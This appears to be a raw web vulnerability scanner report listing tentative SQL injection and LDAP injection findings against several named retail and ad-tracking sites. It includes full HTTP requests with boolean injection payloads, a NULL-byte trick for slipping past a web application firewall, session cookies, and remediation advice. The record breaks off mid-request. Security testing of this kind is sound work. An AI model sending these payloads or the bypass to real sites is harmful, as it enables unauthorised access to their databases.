28.18. https://www.toshibadirect.com/



1. SQL injection
There are 4 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://img.bluenile.com/is/image/bluenile/txttemp_hdr_h5 [$layer_2_text_4 parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://img.bluenile.com
Path:   /is/image/bluenile/txttemp_hdr_h5

Issue detail

The $layer_2_text_4 parameter appears to be vulnerable to SQL injection attacks. The payloads 15710605'%20or%201%3d1--%20 and 15710605'%20or%201%3d2--%20 were each submitted in the $layer_2_text_4 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /is/image/bluenile/txttemp_hdr_h5?$txt_h4$&layer=comp&=1,1&size=170,45&wid=170&hei=45&=0,0&=0,0\tb&$layer_2_text_0=R&$layer_2_text_1=ECENTLY&$layer_2_text_2=P&$layer_2_text_3=URCHASED&$layer_2_text_4=E15710605'%20or%201%3d1--%20&$layer_2_text_5=NGAGEMENT&$layer_2_text_6=R&$layer_2_text_7=INGS\te HTTP/1.1
Host: img.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; bnper=NIB~0&CONTEXT-NAME~53&ver~3&CURR~USD&CURR_SYM~%24; bnses=new~true&ver~1; stc=3NZR3Q; testcookie=

Response 1

HTTP/1.1 200 OK
Content-Length: 3264
Content-Type: image/gif
ETag: "68a098526d9c663ce408d5bf0d8d4097"
Expires: Thu, 30 Jun 2011 02:11:23 GMT
Server: Apache-Coyote/1.1
Date: Mon, 16 May 2011 02:10:18 GMT
Connection: keep-alive

GIF89a ...[binary image data]...
...[SNIP]...

Request 2

GET /is/image/bluenile/txttemp_hdr_h5?$txt_h4$&layer=comp&=1,1&size=170,45&wid=170&hei=45&=0,0&=0,0\tb&$layer_2_text_0=R&$layer_2_text_1=ECENTLY&$layer_2_text_2=P&$layer_2_text_3=URCHASED&$layer_2_text_4=E15710605'%20or%201%3d2--%20&$layer_2_text_5=NGAGEMENT&$layer_2_text_6=R&$layer_2_text_7=INGS\te HTTP/1.1
Host: img.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; bnper=NIB~0&CONTEXT-NAME~53&ver~3&CURR~USD&CURR_SYM~%24; bnses=new~true&ver~1; stc=3NZR3Q; testcookie=

Response 2

HTTP/1.1 200 OK
Content-Length: 3283
Content-Type: image/gif
ETag: "6cd3f5060d003d4a8b293ab0f32fb5b0"
Expires: Thu, 30 Jun 2011 02:11:42 GMT
Server: Apache-Coyote/1.1
Date: Mon, 16 May 2011 02:10:19 GMT
Connection: keep-alive

GIF89a ...[binary image data]...
...[SNIP]...

1.2. http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s08547089211642 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.brookstone.com
Path:   /b/ss/bstoneprod/1/H.21/s08547089211642

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/bstoneprod/1/H.21/s08547089211642?AQB=1&ndh=1&t=15/4/2011%2020%3A58%3A47%200%20300&vmt=4B69B3F8&ns=brookstone&pageName=outdoor%20living%3Ahome&g=http%3A//www.brookstone.com/outdoor-living.html%3Fbkiid%3DworldLandingPage_outdoor_living%7CCXTopNav1FDT%7Coutdoor_living&r=http%3A//www.brookstone.com/outdoor-living.html%3Fbkiid%3DhomePage%7CCXTopNav1FDT%7Coutdoor_living&cc=USD&c1=outdoor%20living&h1=outdoor%20living%3Ahome&v2=worldlandingpage_outdoor_living%7Ccxtopnav1fdt%7Coutdoor_living&v3=outdoor%20living%3Ahome&c4=world%20page&v4=internal%20campaign&c13=E%3AStore_ID%5E%5E%28%272%27%29&c14=T%3Acat_2%5E%5E%28%27111105%27%29&c20=834&c21=111105&c25=results&v28=navigation&v32=SEARCH%2BNAV&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1136&bh=902&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=homepage&pidt=1&oid=http%3A//www.brookstone.com/outdoor-living.html%3Fbkiid%3DhomePage%7CCXTopNav1FDT%7Coutdoor_living_1&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Host: metrics.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/outdoor-living.html?bkiid=worldLandingPage_outdoor_living|CXTopNav1FDT|outdoor_living
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; s_sess=%20s_sq%3Dbstoneprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/outdoor-living.html%2525253Fbkiid%2525253DhomePage%2525257CCXTopNav1FDT%2525257Coutdoor_living_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B%20s_cc%3Dtrue%3B%20s_evar2%3DworldLandingPage_outdoor_living%257CCXTopNav1FDT%257Coutdoor_living%3B; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305512928647%3B

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 02:16:23 GMT
Server: Omniture DC/2.0.0
Content-Length: 404
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/bstoneprod/1/H.21/s08547089211642?AQB=1&ndh=1&t=15/4/2011%2020%3A58%3A47%200%20300&vmt=4B69B3F8&ns=brookstone&pageName=outdoor%20living%3Ahome&g=http%3A//www.brookstone.com/outdoor-living.html%3Fbkiid%3DworldLandingPage_outdoor_living%7CCXTopNav1FDT%7Coutdoor_living&r=http%3A//www.brookstone.com/outdoor-living.html%3Fbkiid%3DhomePage%7CCXTopNav1FDT%7Coutdoor_living&cc=USD&c1=outdoor%20living&h1=outdoor%20living%3Ahome&v2=worldlandingpage_outdoor_living%7Ccxtopnav1fdt%7Coutdoor_living&v3=outdoor%20living%3Ahome&c4=world%20page&v4=internal%20campaign&c13=E%3AStore_ID%5E%5E%28%272%27%29&c14=T%3Acat_2%5E%5E%28%27111105%27%29&c20=834&c21=111105&c25=results&v28=navigation&v32=SEARCH%2BNAV&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1136&bh=902&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=homepage&pidt=1&oid=http%3A//www.brookstone.com/outdoor-living.html%3Fbkiid%3DhomePage%7CCXTopNav1FDT%7Coutdoor_living_1&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Host: metrics.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/outdoor-living.html?bkiid=worldLandingPage_outdoor_living|CXTopNav1FDT|outdoor_living
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; s_sess=%20s_sq%3Dbstoneprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/outdoor-living.html%2525253Fbkiid%2525253DhomePage%2525257CCXTopNav1FDT%2525257Coutdoor_living_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B%20s_cc%3Dtrue%3B%20s_evar2%3DworldLandingPage_outdoor_living%257CCXTopNav1FDT%257Coutdoor_living%3B; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305512928647%3B

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 02:16:23 GMT
Server: Omniture DC/2.0.0
xserver: www373
Content-Length: 0
Content-Type: text/html


1.3. http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s37654085024105 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.gnc.com
Path:   /b/ss/gsicgncf/1/H.20.3/s37654085024105

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/gsicgncf/1/H.20.3/s37654085024105?AQB=1&ndh=1&t=16/4/2011%205%3A55%3A7%201%20300&vmt=2932E0&pageName=Home%20Page&g=http%3A//www.gnc.com/home/index.jsp&r=http%3A//burp/show/10&ch=Home%20Page&server=www.gnc.com&c1=Home%20Page&c2=Home%20Page&c3=External%20Source&c4=www.google.com&c5=New&c7=Home%20Page&c12=Home%20Page&v22=New&v24=6%3A30AM&v25=Monday&v26=Weekday&v27=My%20Account%3A%20Sign-In&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: metrics.gnc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
Cookie: mt.v=1.1133488502.1305543174179; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; s_pers=%20s_lastvisit%3D1305543175233%7C1400151175233%3B%20s_nr%3D1305543307026%7C1308135307026%3B%20gpv_p6%3DHome%2520Page%7C1305545107027%3B; PrefID=32-982599681; s_vi=[CS]v1|26E881040514A1E8-60000163401B15C0[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 11:08:38 GMT
Server: Omniture DC/2.0.0
Content-Length: 397
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/gsicgncf/1/H.20.3/s37654085024105?AQB=1&ndh=1&t=16/4/2011%205%3A55%3A7%201%20300&vmt=2932E0&pageName=Home%20Page&g=http%3A//www.gnc.com/home/index.jsp&r=http%3A//burp/show/10&ch=Home%20Page&server=www.gnc.com&c1=Home%20Page&c2=Home%20Page&c3=External%20Source&c4=www.google.com&c5=New&c7=Home%20Page&c12=Home%20Page&v22=New&v24=6%3A30AM&v25=Monday&v26=Weekday&v27=My%20Account%3A%20Sign-In&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: metrics.gnc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
Cookie: mt.v=1.1133488502.1305543174179; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; s_pers=%20s_lastvisit%3D1305543175233%7C1400151175233%3B%20s_nr%3D1305543307026%7C1308135307026%3B%20gpv_p6%3DHome%2520Page%7C1305545107027%3B; PrefID=32-982599681; s_vi=[CS]v1|26E881040514A1E8-60000163401B15C0[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 11:08:38 GMT
Server: Omniture DC/2.0.0
xserver: www408
Content-Length: 0
Content-Type: text/html


1.4. http://www.homedepot.ca/webapp/wcs/stores/servlet/Home [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.homedepot.ca
Path:   /webapp/wcs/stores/servlet/Home

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.homedepot.ca
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=135472616.1305510002.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=135472616.1475317367.1305510002.1305510002.1305510002.1; __utmc=135472616; __utmb=135472616.1.10.1305510002; jsEnabled=1; RES_TRACKINGID=989860238041728; RES_SESSIONID=223896591225639; ResonanceSegment=1; s_cc=true; s_v14=English; s_sq=%5B%5BB%5D%5D; hd_search_cookie=1; localRegion=446%2C7080%2CToronto%2C43.6687%2C-79.3382; s_vi=[CS]v1|26E840400507A189-40000102A0090C5F[CE]; fsr.s={"v":1,"rid":"1305510029454_909320","to":3,"c":"http://www.homedepot.ca/webapp/wcs/stores/servlet/Home","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}

Response 1

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-CA
Date: Mon, 16 May 2011 01:54:35 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=315360000
Expires: Thu, 13 May 2021 01:54:34 GMT
Content-Length: 94929


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
...[SNIP]...
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=931982&Ntt=931982&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber"><img src="/wcsstore/HomeDepotCanada/images/catalog/77994b3d-1a90-4ea2-b07a-33fdd6110c32_2.jpg" alt="Fasara&amp;#153; Interior Design Window Film - Rice Paper" width="100" height="100"></a>
<p class="prod-title">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=931982&Ntt=931982&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">3M&#153;</a>
</p>
<p class="prod-desc">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=931982&Ntt=931982&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">Fasara&#153; Interior Design Window Film - Rice Paper</a>
</p>
<p class="price-container">
<span class="price"><span class="old-price">$34.95</span><span class="new-price">$29.99</span></span><span class="promos"><img class="lower-price" src="/wcsstore/HomeDepotCanada/images/global/icons/en/lower-price.gif" width="30" height="30"></span>
</p>
</div>
<div class="prod">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=916387&Ntt=916387&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber"><img src="/wcsstore/HomeDepotCanada/images/catalog/15886.RectangleDeckLt19152_011_2.jpg" alt="Solar LED Rectangle Deck Light - 2 Pack" width="100" height="100"></a>
<p class="prod-title">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=916387&Ntt=916387&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">Hampton Bay</a>
</p>
<p class="prod-desc">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=916387&Ntt=916387&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">Solar LED Rectangle Deck Light - 2 Pack
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.homedepot.ca
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=135472616.1305510002.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=135472616.1475317367.1305510002.1305510002.1305510002.1; __utmc=135472616; __utmb=135472616.1.10.1305510002; jsEnabled=1; RES_TRACKINGID=989860238041728; RES_SESSIONID=223896591225639; ResonanceSegment=1; s_cc=true; s_v14=English; s_sq=%5B%5BB%5D%5D; hd_search_cookie=1; localRegion=446%2C7080%2CToronto%2C43.6687%2C-79.3382; s_vi=[CS]v1|26E840400507A189-40000102A0090C5F[CE]; fsr.s={"v":1,"rid":"1305510029454_909320","to":3,"c":"http://www.homedepot.ca/webapp/wcs/stores/servlet/Home","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}

Response 2

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-CA
Date: Mon, 16 May 2011 01:54:35 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=315360000
Expires: Thu, 13 May 2021 01:54:35 GMT
Content-Length: 95035


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
...[SNIP]...
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=916387&Ntt=916387&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber"><img src="/wcsstore/HomeDepotCanada/images/catalog/15886.RectangleDeckLt19152_011_2.jpg" alt="Solar LED Rectangle Deck Light - 2 Pack" width="100" height="100"></a>
<p class="prod-title">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=916387&Ntt=916387&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">Hampton Bay</a>
</p>
<p class="prod-desc">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=916387&Ntt=916387&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">Solar LED Rectangle Deck Light - 2 Pack</a>
</p>
<p class="price-container">
<span class="price"><span class="old-price">$39.99</span><span class="new-price">$34.99</span></span><span class="promos"><img class="lower-price" src="/wcsstore/HomeDepotCanada/images/global/icons/en/lower-price.gif" width="30" height="30"></span>
</p>
</div>
<div class="prod">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=931982&Ntt=931982&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber"><img src="/wcsstore/HomeDepotCanada/images/catalog/77994b3d-1a90-4ea2-b07a-33fdd6110c32_2.jpg" alt="Fasara&amp;#153; Interior Design Window Film - Rice Paper" width="100" height="100"></a>
<p class="prod-title">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=931982&Ntt=931982&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">3M&#153;</a>
</p>
<p class="prod-desc">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=931982&Ntt=931982&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">Fasara&#153; Interior Design Window Film - Rice Paper
...[SNIP]...

2. LDAP injection
There are 3 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. http://action.media6degrees.com/orbserv/hbjs [pixId parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://action.media6degrees.com
Path:   /orbserv/hbjs

Issue detail

The pixId parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the pixId parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /orbserv/hbjs?pixId=*)(sn=*&pcv=30 HTTP/1.1
Host: action.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BDC5BFE2B79833787C45D44D5E9395EC; ipinfo=2ll77mm0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=014020a0g0h1ll77mmxzt12dfmxzt12dfmxzt10; clid=2ll77mm01171voofy6a0tk1w02ehk0093r080l08509; orblb=2ll8nk2031zw10u0100yjk2gu10u0100yg11y510u0100000; rdrlst=4090spbll9m03000000033r030d6hll8nk2000000083r0815ztll9l28000000043r040dlzll9l28000000043r0401hvll8nk2000000083r0816iell9m03000000033r030msvll9m03000000033r0301g3ll8nk2000000083r080e6mll9m03000000033r03; sglst=2050s90ill9m03000430033r030l03503dlell9l28000000043r040l045045msll9l28000000043r040l04504c24ll9l28000000043r040l045041jzll8nk200yk40083r080l08508; vstcnt=418b010r01496o0118e1002

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w02f3000a3r090l0950a; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:10 GMT; Path=/
Set-Cookie: orblb=2ll8nk2031zw10u0100yjk2gu10u0100yg11y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:10 GMT; Path=/
Set-Cookie: rdrlst=4090spbll9m03000000043r040d6hll8nk2000000093r090dlzll9l28000000053r0515ztll9l28000000053r0501hvll8nk2000000093r0916iell9m03000000043r0401g3ll8nk2000000093r090msvll9m03000000043r040e6mll9m03000000043r04; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:10 GMT; Path=/
Set-Cookie: sglst=2050s90ill9m03000pj0043r040l04504dlell9l28000000053r050l055055msll9l28000000053r050l05505c24ll9l28000000053r050l055051jzll8nk200z5k0093r090l09509; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:10 GMT; Path=/
Set-Cookie: vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:10 GMT; Path=/
Set-Cookie: JSESSIONID=BFCF45F58B9C4575A09FBB0A8F2FCF28; Path=/orbserv
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 5
Date: Mon, 16 May 2011 01:56:09 GMT






Request 2

GET /orbserv/hbjs?pixId=*)!(sn=*&pcv=30 HTTP/1.1
Host: action.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
